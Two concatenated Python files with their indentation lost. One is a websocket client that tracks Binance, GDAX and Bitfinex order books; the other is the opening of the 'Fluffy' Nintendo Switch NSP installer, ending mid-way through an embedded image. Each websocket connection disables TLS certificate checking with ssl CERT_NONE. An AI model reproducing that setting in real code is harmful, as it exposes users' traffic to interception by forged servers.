self.order_books_[market.BINANCE] = binance_order_book()
def is_active(self, market):
return market in self.mdsymbols_
def id(self):
return self.id_
def mdsymbol(self, market):
return self.mdsymbols_[market]
def bids(self, market):
return self.order_books_[market].bids_
def asks(self, market):
return self.order_books_[market].asks_
def top(self, market):
return self.order_books_[market].top()
def order_book(self, market):
return self.order_books_[market]
def average_trade(self, market):
o = self.order_book(market)
return np.median(o.last_traded_) if len(o.last_traded_) > 0 else 0.0
def wpx(self, market):
if len(self.bids(market)) > 0 and len(self.asks(market)) > 0:
return (self.bids(market)[0].price_ * self.asks(market)[0].qty_ + self.asks(market)[0].price_ * self.bids(market)[0].qty_) \
/ (self.bids(market)[0].qty_ + self.asks(market)[0].qty_)
else:
return 0.0
def wpx5(self, market):
if len(self.bids(market)) < 5 or len(self.asks(market)) < 5:
return 0.0
a = 0.0
b = 0.0
for i in range(0, 5):
bl = self.bids(market)[i]
al = self.asks(market)[i]
a += bl.price_ * al.qty_ + al.price_ * bl.qty_
b += bl.qty_ + al.qty_
return a / b
def to_string(self, market):
return 'wpx: %.4f wpx5: %.4f traded: %s (%s - %s)' \
% (self.wpx(market), self.wpx5(market), self.average_trade(market), self.top(market)[0], self.top(market)[1])
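# Worked example of wpx() above (added for clarity): with best bid
# 100.00 x 9 and best ask 100.10 x 1, the size-weighted mid is
#   (100.00 * 1 + 100.10 * 9) / (9 + 1) = 100.09
# so the microprice leans toward the ask when the bid side is heavier, a
# common reading being that the next trade is likely to print on that side.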
class binance:
def __init__(self, url, products):
self.market_ = market.BINANCE
self.uri_ = url
self.stop_ = False
self.cid_ = randint(100, 2000)
self.sockets_ = []
self.instruments_ = {}
for i in products:
if i.is_active(self.market_):
self.instruments_[i.mdsymbol(self.market_)] = i
self.logger_ = logging.getLogger('binance')
self.logger_.setLevel(logging.INFO)
def run(self):
def run_internal():
self.connect()
self.listen()
self.thread_ = Thread(target=run_internal)
self.thread_.start()
def stop(self):
self.stop_ = True
if self.thread_:
self.thread_.join()
for item in self.sockets_:
item[0].close()
def connect(self):
for k,i in self.instruments_.items():
url = "%s/%s@depth5" % (self.uri_, i.mdsymbol(self.market_))
self.logger_.info("connecting: %s" % url)
ws = websocket.create_connection(url, \
timeout=WS_TIMEOUT, \
sslopt={"cert_reqs": ssl.CERT_NONE }, \
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.sockets_.append([ws, i])
self.handle_connected(ws)
def listen(self):
while not self.stop_:
for item in self.sockets_:
try:
msg = item[0].recv()
data = json.loads(msg)
except json.JSONDecodeError:
continue # skip frames that fail to parse
else:
self.handle_partial_book(item[1], data)
def handle_partial_book(self, ins, data):
self.logger_.debug("received %s" % data)
ins.order_book(self.market_).update(data)
self.logger_.debug("price update on %s" % ins.to_string(self.market_))
def handle_connected(self, ws):
self.logger_.info("connected")
class gdax:
def __init__(self, url, products):
self.market_ = market.GDAX
self.uri_ = url
self.stop_ = False
self.ws_ = None
self.instruments_ = {}
for i in products:
if i.is_active(self.market_):
self.instruments_[i.mdsymbol(self.market_)] = i
self.logger_ = logging.getLogger('gdax')
self.logger_.setLevel(logging.INFO)
def run(self):
def run_internal():
self.connect()
self.listen()
self.thread_ = Thread(target=run_internal)
self.thread_.start()
def stop(self):
for k,v in self.instruments_.items():
self.unsubscribe_price(self.ws_, v)
self.stop_ = True
if self.thread_:
self.thread_.join()
self.ws_.close()
def connect(self):
self.logger_.info("connecting: %s" % self.uri_)
self.ws_ = websocket.create_connection(self.uri_, \
timeout=WS_TIMEOUT, \
sslopt={"cert_reqs": ssl.CERT_NONE }, \
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.handle_connected(self.ws_)
def listen(self):
ws = self.ws_
while not self.stop_:
try:
msg = ws.recv()
data = json.loads(msg)
except json.JSONDecodeError:
continue # skip frames that fail to parse
else:
t = data['type']
if t == 'error':
self.handle_error(ws, data)
elif t == 'subscriptions':
self.handle_subscription(ws, data)
elif t == 'heartbeat':
self.handle_heartbeat(ws, data)
elif t == 'snapshot':
self.handle_snapshot(ws, data)
elif t == 'l2update':
self.handle_l2update(ws, data)
elif t == 'ticker':
self.handle_ticker(ws, data)
def get_instrument(self, id):
if not id in self.instruments_:
raise Exception("Unexpected instrument: %s in snap" % id)
return self.instruments_[id]
def handle_ticker(self, ws, data):
self.logger_.debug("received ticker %s" % data)
ins = self.get_instrument(data['product_id'])
ins.order_book(self.market_).trade(data)
def handle_heartbeat(self, ws, data):
self.logger_.debug("received hearbeat for %s seq: %s time: %s" % (data['product_id'], data['sequence'], data['time']))
id = data['product_id']
if not id in self.instruments_:
raise Exception("Unexpected instrument: %s in snap" % id)
# ins = self.instruments_[id]
# ins.last_update_ = data['time']
# ins.sequenuce_ = data['sequence']
def handle_error(self, ws, data):
self.logger_.error("error msg received: %s" % data)
def handle_snapshot(self, ws, data):
self.logger_.debug("received snap %s" % data)
id = data['product_id']
if not id in self.instruments_:
raise Exception("Unexpected instrument: %s in snap" % id)
ins = self.instruments_[id]
ins.order_book(self.market_).snapshot(data['bids'], data['asks'])
def handle_l2update(self, ws, data):
self.logger_.debug("received l2data %s" % data)
ins = self.get_instrument(data['product_id'])
ins.order_book(self.market_).update(data['changes'])
self.logger_.debug("price update on %s" % ins.to_string(self.market_))
def handle_subscription(self, ws, data):
self.logger_.info("received subscription update: %s" % data)
def handle_connected(self, ws):
self.logger_.info("connected")
for k,v in self.instruments_.items():
self.subscribe_price(ws, v)
def subscribe_price(self, ws, ins):
self.logger_.debug("subscribing on %s" % ins.id())
ws.send(json.dumps({ 'type' : 'subscribe', 'product_ids' : ['%s' % ins.mdsymbol(self.market_) ], 'channels' : ['level2', 'heartbeat', 'ticker'] }))
def unsubscribe_price(self, ws, ins):
self.logger_.info("unsubscribe from %s" % ins.id())
ws.send(json.dumps({ 'type' : 'unsubscribe', 'product_ids' : ['%s' % ins.mdsymbol(self.market_) ], 'channels' : ['level2', 'heartbeat', 'ticker'] }))
class finex:
def __init__(self, url, products):
self.market_ = market.FINEX
self.uri_ = url
self.stop_ = False
self.subscription_ = {}
self.channel_map_ = {}
self.cid_ = randint(100, 2000)
self.ws_ = None
self.instruments_ = []
for i in products:
if i.is_active(self.market_):
self.instruments_.append(i)
self.logger_ = logging.getLogger('finex')
self.logger_.setLevel(logging.INFO)
def run(self):
def run_internal():
self.connect()
self.listen()
self.thread_ = Thread(target=run_internal)
self.thread_.start()
def stop(self):
        for chn_id in list(self.channel_map_):
            self.unsubscribe_channel(self.ws_, chn_id)
self.stop_ = True
if self.thread_:
self.thread_.join()
self.ws_.close()
def connect(self):
self.logger_.info("connecting: %s" % self.uri_)
        self.ws_ = websocket.create_connection(self.uri_,
                                               timeout=WS_TIMEOUT,
                                               sslopt={"cert_reqs": ssl.CERT_NONE},
                                               sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.handle_connected(self.ws_)
def listen(self):
ws = self.ws_
while not self.stop_:
try:
msg = ws.recv()
data = json.loads(msg)
            except json.JSONDecodeError:
                # skip malformed frames
                continue
else:
if isinstance(data, dict):
t = data['event']
if t == 'info':
self.handle_info(ws, data)
elif t == 'pong':
self.handle_pong(ws, data)
elif t == 'error':
self.handle_error(ws, data)
elif t == 'subscribed':
self.handle_subscribed(ws, data)
elif t == 'unsubscribed':
self.handle_unsubscribed(ws, data)
else:
if data[1] == 'hb':
self.heartbeat_handler()
else:
self.data_handler(data)
def heartbeat_handler(self):
self.logger_.debug("received heartbeat")
def data_handler(self, data):
self.logger_.debug("received data on channel: %s" % data)
# check channel exists
        if data[0] not in self.channel_map_:
self.logger_.error("received data on unknown channel: %s" % data)
return
c = self.channel_map_[data[0]]
if isinstance(c, price_channel):
ins = c.symbol_
o = ins.order_book(self.market_)
if o.is_synced():
o.update(data[1])
else:
o.snapshot(data[1])
self.logger_.debug("price update on %s" % ins.to_string(self.market_))
def handle_connected(self, ws):
self.logger_.info("connected")
for i in self.instruments_:
self.subscribe_price(ws, i)
    def subscribe_channel(self, ws, channel, kwargs=None):
        # avoid the shared-mutable-default pitfall
        kwargs = kwargs or {}
        d = channel_data(channel)
self.subscription_[channel] = d
d.status_ = channel_state.SUBSCRIBING
self.logger_.debug("subscribing to channel: %s" % d.name_)
dict1 = { 'event' : 'subscribe', 'channel' : '%s' % channel }
ws.send(json.dumps({**dict1, **kwargs}))
def unsubscribe_channel(self, ws, chn_id, delete=False):
if chn_id in self.channel_map_:
d = self.channel_map_[chn_id]
self.logger_.info("unsubscribing from channel: %s id: %s" % (d.name_, d.id_))
ws.send(json.dumps({ 'event' : 'unsubscribe', 'chanId' : '%s' % d.id_ }))
if delete:
del self.channel_map_[d.id_]
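    # Subscription handshake: pending requests are keyed by channel name in
    # subscription_; handle_subscribed() later remaps them, via channel_map_,
    # to the numeric chanId the server assigns.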
def subscribe_price(self, ws, ins):
channel = 'book-%s' % ins.id()
d = price_channel(channel, ins)
d.status_ = channel_state.SUBSCRIBING
self.subscription_[channel] = d
self.logger_.debug("subscribing for price on %s" % ins.id())
ws.send(json.dumps({ 'event' : 'subscribe', 'channel' : 'book', 'symbol' : '%s' % ins.mdsymbol(self.market_) }))
def unsubscribe_price(self, ws, chn_id):
self.unsubscribe_channel(ws, chn_id)
def handle_subscribed(self, ws, j):
self.logger_.info("received subscription: %s" % j)
channel = '%s-%s' % (j['channel'], j['symbol'][1:])
        if channel not in self.subscription_:
raise Exception("invalid subscription response: %s" % j)
d = self.subscription_[channel]
d.status_ = channel_state.SUBSCRIBED
d.id_ = j['chanId']
self.channel_map_[d.id_] = d
self.logger_.info("subscribed to channel: %s id: %s" % (d.name_, d.id_))
def handle_unsubscribed(self, ws, j):
        if j['chanId'] not in self.channel_map_:
self.logger_.error("Can't find channel %s" % j['chanId'])
return
d = self.channel_map_[j['chanId']]
if j['status'] == 'OK':
self.logger_.info("unsubscribed from channel: %s id: %s" % (d.name_, d.id_))
del self.subscription_[d.name_]
del self.channel_map_[d.id_]
def handle_error(self, ws, j):
errors = {10000: 'Unknown event',
10001: 'Generic error',
10008: 'Concurrency error',
10020: 'Request parameters error',
10050: 'Configuration setup failed',
10100: 'Failed authentication',
10111: 'Error in authentication request payload',
10112: 'Error in authentication request signature',
10113: 'Error in authentication request encryption',
10114: 'Error in authentication request nonce',
10200: 'Error in un-authentication request',
10300: 'Subscription Failed (generic)',
10301: 'Already Subscribed',
10302: 'Unknown channel',
10400: 'Subscription Failed (generic)',
10401: 'Not subscribed',
11000: 'Not ready, try again later',
20000: 'User is invalid!',
20051: 'Websocket server stopping',
20060: 'Websocket server resyncing',
20061: 'Websocket server resync complete'
}
        self.logger_.error(errors.get(j['code'], "Unknown error code: %s" % j.get('code')))
def handle_info(self, ws, j):
self.logger_.info("%s" % j)
def handle_pong(self, ws, j):
self.logger_.debug("pong received")
def ping(self, ws):
msg = json.dumps({ 'event' : 'ping' })
self.logger_.debug("sent ping: %s" % msg)
ws.send(msg)
def print_state(logger, instruments):
for i in instruments:
if i.is_active(market.FINEX):
logger.info("%s (%s) : %s" % (i.id(), market.FINEX, i.to_string(market.FINEX)))
if i.is_active(market.GDAX):
logger.info("%s (%s): %s" % (i.id(), market.GDAX, i.to_string(market.GDAX)))
if i.is_active(market.BINANCE):
logger.info("%s (%s): %s" % (i.id(), market.BINANCE, i.to_string(market.BINANCE)))
if __name__ == "__main__":
usage = "usage: %prog [options]"
opt = optparse.OptionParser(usage=usage, version="%prog 1.0")
(options, args) = opt.parse_args()
consoleLogger = logging.StreamHandler()
    consoleLogger.setFormatter(log_formatter(fmt=LOG_FORMAT, datefmt='%H:%M:%S.%f'))
logging.basicConfig(handlers=[consoleLogger])
# setup websockets logger
logging.getLogger('websockets').setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# create instruments
instruments = [ instrument("BTCUSD", { market.FINEX : "BTCUSD", market.GDAX : "BTC-USD", market.BINANCE : "btcusdt" }), \
instrument("ETHUSD", { market.FINEX : "ETHUSD", market.GDAX : "ETH-USD", market.BINANCE : "ethusdt" }) ]
try:
f = finex(BITFINEX_URL, instruments)
g = gdax(GDAX_URL, instruments)
b = binance(BINANCE_URL, instruments)
f.run()
g.run()
b.run()
while True:
time.sleep(2)
print_state(logger, instruments)
except KeyboardInterrupt:
logger.info("stop requested")
b.stop()
g.stop()
f.stop()
    except Exception:
        import traceback
        traceback.print_exc()
b.stop()
g.stop()
f.stop() |
fluffy.pyw | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""""
"Cute Penguin" was designed by fourminute. The font
used in the "Fluffy" logo is 100% royalty free.
Fluffy (this program) and the "Cute Penguin"
design is Copyright (c) 2019 fourminute
(https://github.com/fourminute)
Fluffy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Fluffy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
"""""
# Imports
import signal
import time
import socket
import base64
import os
import sys
import threading
import struct
import random
import re
import configparser
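# Resolve a per-user data directory: ~/.fluffy on Linux, the current working
# directory on Windows and anything else.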
try:
if "win" in sys.platform[:3].lower():
initial_dir = os.getcwd() + "/"
elif "linux" in sys.platform.lower():
if not os.path.exists(os.path.expanduser('~') + "/.fluffy"):
os.makedirs(os.path.expanduser('~') + "/.fluffy")
initial_dir = os.path.expanduser('~') + "/.fluffy/"
else: # MacOS. A little help here would be great.
initial_dir = os.getcwd() + "/"
except Exception:
    initial_dir = os.getcwd() + "/"
try:
import logging
if os.path.isfile(initial_dir + 'fluffy.log'):
os.remove(initial_dir + 'fluffy.log')
LOG_FILENAME = initial_dir + 'fluffy.log'
logging.basicConfig(filename=LOG_FILENAME, level=logging.DEBUG)
logging.debug("Fluffy Log: If you see nothing here. Good!")
is_logging = True
except Exception:
    is_logging = False
    print('Error: Logging not possible. Possible permission issue.')
try:
from tkinter import filedialog
import tkinter as tk
root = tk.Tk()
root.withdraw()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
logging.debug("Error: Failed to import Tkinter.")
print('Error: Failed to import Tkinter.')
print(str(e))
sys.exit()
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from urllib import quote
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import quote
try:
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt, QThread, QByteArray
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QPixmap, QColor, QImage
app = QtWidgets.QApplication(sys.argv)
window = QMainWindow()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
logging.debug("Error: Failed to import PyQt5.")
print('Error: Failed to import PyQt5.')
print(str(e))
sys.exit()
try:
import usb.core
import usb.util
except ImportError:
    logging.debug("Error: Failed to import modules required for USB install. Defaulting to Network Mode.")
    print('Error: Failed to import modules required for USB install. Defaulting to Network Mode.')
    usb_success = False
# Variables
VERSION = "2.9.2"
MONERO_ADDRESS = "4APPsi7nnAs4ZjGC58V5CjVnceEvnZbY1WCBSjmcQsKhGPWLL2EaoUDU2RVFnuLEnASRA2ECXD4YvQ8hyVyZg1raJ482yei"
thanks = ["DDinghoya", "YoyPa","Sev73n","LoOkYe","wendyliga","TheZoc","TheLastZombie","friedkeenan","danypava", "DavidOliM","TorpedoXL","gut5"]
GREEN = "QLabel {color: #09A603;}"
BLUE = "QLabel {color: #00A2FF;}"
RED = "QLabel {color: #cc2249;}"
PURPLE = "QLabel {color: #7F0CE8;}"
goldpixmap = QPixmap()
iconpixmap = QPixmap()
inlaypixmap = QPixmap()
dinlaypixmap = QPixmap()
aboutpixmap = QPixmap()
transfer_rate = 0
is_installing = False
last_error = "NA"
is_done = False
is_network = False
is_goldleaf = False
selected_dir = None
selected_files = None
sent_header = False
start_time = time.time()
cur_transfer_rate = 0
last_transfer_rate = 0
cur_progress = 0
end_progress = 0
cur_nsp_count = 1
total_nsp = 0
cur_nsp_name = "NA"
switch_ip = "0.0.0.0"
host_ip = "0.0.0.0"
language = 0
qresponse = False
needresponse = False
qrespnum = 0
haveresponse = False
allow_access_non_nsp = 0
ignore_warning_prompt = 0
global_dev = None
global_in = None
global_out = None
task_canceled = False
usb_success = False
# Load Settings
if os.path.isfile(initial_dir + 'fluffy.conf'):
try:
with open(initial_dir + 'fluffy.conf') as cfgfile:
configp = configparser.ConfigParser()
configp.read_file(cfgfile)
switch_ip = configp.get('DEFAULT', 'switch_ip')
dark_mode = int(configp.get('DEFAULT', 'dark_mode'))
language = int(configp.get('DEFAULT', 'language'))
allow_access_non_nsp = int(configp.get('DEFAULT', 'allow_access_non_nsp'))
ignore_warning_prompt = int(configp.get('DEFAULT', 'ignore_warning_prompt'))
print("Successfully loaded config: \'" + str(initial_dir) + "fluffy.conf\'")
    except Exception:
        print("Failed to parse config: '" + str(initial_dir) + "fluffy.conf'")
        switch_ip = "0.0.0.0"
        dark_mode = 0
        language = 0
        allow_access_non_nsp = 0
        ignore_warning_prompt = 0
else:
print("Config not found: \'" + str(initial_dir) + "fluffy.conf\'")
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
allow_access_non_nsp = 0
ignore_warning_prompt = 0
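# Base64-encoded PNG artwork for the About dialog; QPixmap.loadFromData can
# render it after base64 decoding.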
ABOUT_DATA = b'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